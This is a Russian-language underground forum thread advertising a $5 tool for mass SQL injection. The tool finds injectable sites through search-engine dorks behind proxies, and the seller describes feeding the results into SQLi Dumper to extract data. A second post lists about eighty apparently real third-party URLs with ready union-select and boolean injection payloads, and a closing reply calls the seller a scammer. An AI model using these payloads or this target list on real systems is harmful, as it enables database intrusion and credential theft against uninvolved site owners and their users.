Продам софт для массового SQLi

=====================================================


Что умеет эта вкладка:

^_^ Многопоточность. Одновременное отображение и сохранение результатов в RT.
^_^ Понимает проксы/соксы.
^_^ Для парсинга используется смесь Google+Bing.
^_^ Что парсить - ваш выбор. Только домены, или только потенциальные SQL или все в кучу.
^_^ Капч не боится от слова "совсем".
=========================================================================



Что умеет эта вкладка:
^_^ Быстро почистить вставленные строки на дубли
^_^ Перевернуть строки относительно двоеточия (логин:пароль -> пароль:логин. Ну или наоборот)
^_^ Получить айпишники хостов
=========================================================================


Что умеет эта вкладка:

^_^ Наковырять потенциальных SQLi ссылок с помощью SiteMap сервиса.
=========================================================================







Как пользоваться:

Для примера возьму заведомо уязвимую ссылку, которую нашел с помощью дорка: http://www.marceline.com/content.cfm?type=999999.9 union all select 1,[t],3

Всего одна ссылочка выбилась, мне это не понравилось. попробуем пощщупать хостинг.. т.к. ссылка всего одна, то мне хватит и cmd:


айпишник знаем. Проксами зараннее запасся, готовим парсер:


Все готово, запускаем и ждем:

Потихоньку проявляется.. Ну и норм. Все, что проявилось - пихаем в SQLi Dumper v8.2 и получаем результат:


Вот так то вот. Метод простой и эффективный (даже без специальных дорок пробовал), ага. Но если ты не умеешь сам себе софт писать - умотаешься такие дела проворачивать массово же)




Сразу отвечаю, почему продаю. Пустые места на панелях видели? Их есть чем заполнить, но вот по бюджету я просел нехиленько так. Потому и цена символическая $5. Без привязки, делайте что хотите, отзывы рекомендации и критика приветствуются. Кто приобретет - тем пожизненный доступ к фтп с обновами.

Всем удачи.

[email protected]/exploit.im

 

Не знаю, куда это применить. Я кодер, а не скриптоцидник( Просто пока тестировал, дык накопилось. Пусть будет тут.

http://barijay.com/product-listing.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8,9
http://www.traintime.uk/index.php?from=CHK999999.9' union all select 1,2,3,4,[t],6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 and '0'='0
http://slyelectronics.com/productdetails.php?prodID=999999.9 union all select 1,2,3,4,[t]
http://www.agesandstages.net/blog.php?id=40' and [t] and '1'='1
http://www.spotsolar.com/product/view_product.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
http://www.tafe.com/product.php?product_id=54' and [t] and '1'='1
http://www.campinguia.com/ver_video.asp?id=[t]
http://paiste.com/e/product_any_det.php?menuid=[t]
http://www.northernacres.com/listing.php?id=59999999.9' union all select 1,2,3,4,5,6,7,8,[t],10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 and '0'='0
http://www.treadofpioneers.org/article.php?id=15' and [t] and '1'='1
http://www.myschiffs.com/orders/index.php?subcat=SALADS' and [t] and '1'='1
http://www.ergpa.com/news/news_articles.php?id=[t]
http://testphp.vulnweb.com/listproducts.php?cat=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t]
http://testephp.vulnweb.com/listproducts.php?cat=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t]
http://www.estudiorozanski.com/main.php?idioma=[t] and 1=1
http://www.sglaw.cn/team_list.php?i=999999.9' union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '0'='0
http://sneaindia.com/index.php?id=[t]
http://www.dublinsquarepub.com/news.php?id=999999.9 union all select 1,2,3,[t],5,6
http://www.suesupriano.com/article.php?id=999999.9 union all select [t],2
http://www.ferronitransmission.it/product-det.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13
http://jamesbaird.ca/profile_view.php?id=13999999.9' union all select [t],2,3,4 and '0'='0
http://www.psgayyellowpages.com/category.asp?cid=999999.9 union all select [t]
http://mindmeter.com/catbrowse.cfm?category_ID=[t]
http://eliteboatsales.net/simple_listing.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
http://www.kobayashi-web.com/item-detail.php?item_id=999999.9 union all select 1,2,3,4,5,[t],7,8,9,10,11,12,13
http://www.rohanart.com/gallery.php?ID=999999.9' union all select 1,2,3,[t],5,6,7,8,9,10 and '0'='0
http://westchester.org/index.php?section=[t]
http://www.ramblermines.com/career_listing.php?id=110999999.9' union all select 1,[t],3,4,5,6 and '0'='0
http://www.jamesdoranwebb.com/articles.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13--
http://www.shaggyfoundation.org/gallery.php?id=[t]
http://www.slotsetc.com/forsale/itemDetail.php?itemID=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11
http://www.chicago-locksmith.com/Category.asp?CatId=[t]
http://www.offcampushousing.info/detail.cfm?id=[t]
http://www.cwaaonline.org/content.cfm?type=999999.9 union all select 1,[t],3
http://www.marceline.com/content.cfm?type=999999.9 union all select 1,[t],3
http://www.dubaypoa.com/content.cfm?type=999999.9 union all select 1,[t],3
http://swmobcia.com/?id=999999.9 union all select 1,[t],3
http://mtvernon-cityhall.org/index.cfm?content=[t]
http://www.samedayprint.co.nz/productlist.php?id=pr' and [t] and '1'='1
http://www.ampak.com.tw/product.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8
http://www.tokaiguitar.de/produktdetail.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8
http://www.ecole-de-chiot.fr/articles.php?rub=999999.9 union all select 1,2,3,[t],5,6
http://www.micromed.eu/prodsel.asp?cat=[t]
http://www.micromed-it.com/index.asp?lng=[t]
http://mtmmachinery.com/applications.asp?open=[t]
http://www.eltelpark.it/vedivideo.asp?id=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,[t],16,17
http://www.tuttoagriturismo.net/agriturismo.asp?id=[t]
http://www.fwdevelopments.com/product-category.cfm?cat=[t]
http://bellasamui.com/koh-samui-shopping.php?id=999999.9 union all select 1,2,[t],4,5,6
http://newsandviews24.com/read.php?id=p_36 or 1=[t] and 1=1
http://cordoganclark.com/newsitem.php?id=999999.9 union all select 1,2,3,[t],5,6
http://shugahaircare.com/product_details.php?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13
http://www.carolbrass.com/product_list.php?i=72' and [t] and '1'='1
http://www.trulyscience.com/articles.php?id=999999.9' union all select 1,2,3,4,5,6,7,8,9,[t],11,12,13 and '0'='0
http://www.vacationet.com/resort.php?id=1' and [t] and '1'='1
http://www.wetstage.com/refout.php?id=[t]
http://auction-warehouse.com/category.cfm?categoryID=[t]
http://www.elvisphotos.com/gallery/category.asp?cat_id=[t]
http://www.atrium.com.pk/Shopping.php?ID=1' and [t] and '1'='1
http://www.security-depot.net/product_details.php?id=[t]
http://cyfair-cypress-texas-pros.com/category.asp?cid=[t]
http://www.coda-continuum.com/product/product.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13
http://www.bcgiftware.com.au/store/page.asp?PageId=999999.9 union all select [t],2,3
http://www.icmd.com.sa/aboutus.php?id=999999.9 union all select 1,[t],3,4
http://www.tunesoman.com/product.php?id=[t]
http://www.tqncompanies.com/portfolio.php?ID=75999999.9' union all select 1,2,[t],4,5,6,7 and '0'='0
http://www.lubersy.ru/job/vacancy_view.php?id=999999.9 union all select [t]
http://www.alde.co.uk/itemdetails.php?itemId=14' and [t] and '1'='1
http://dktdakota.com/escaparate.php?esc=999999.9 union all select [t],2,3,4,5,6--
http://www.meggieschneider.com/php/detail.php?id=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
http://www.origin-food.org/2005/base.php?cat=999999.9 union all select 1,2,3,4,5,[t],7,8
http://www.univer-group.com/it/videoplay.php?i=8' and [t] and '1'='1
http://www.gilescartoons.co.uk/viewitem.asp?ID=[t]
http://document-records.com/show_article.asp?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10
http://www.mchalefm.ie/photos.php?id=23" and [t] and "1"="1
http://www.mozhaysk.ru/banners/clickcountdirect.php?id=91999999.9' union all select 1,2,3,4,5,[t],7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 and '0'='0&b=1
http://deblauwewimpel.info/index.php?subcat=uitgeverij' and [t] and '1'='1
http://www.bazex.sk/index.php?subcat=314' and [t] and '1'='1
http://enchantedgardenarts.com/index.php?SUBCAT=13 or 1=[t] and 1=1

 

this guy is RIPPER HE TOOK ME 50$.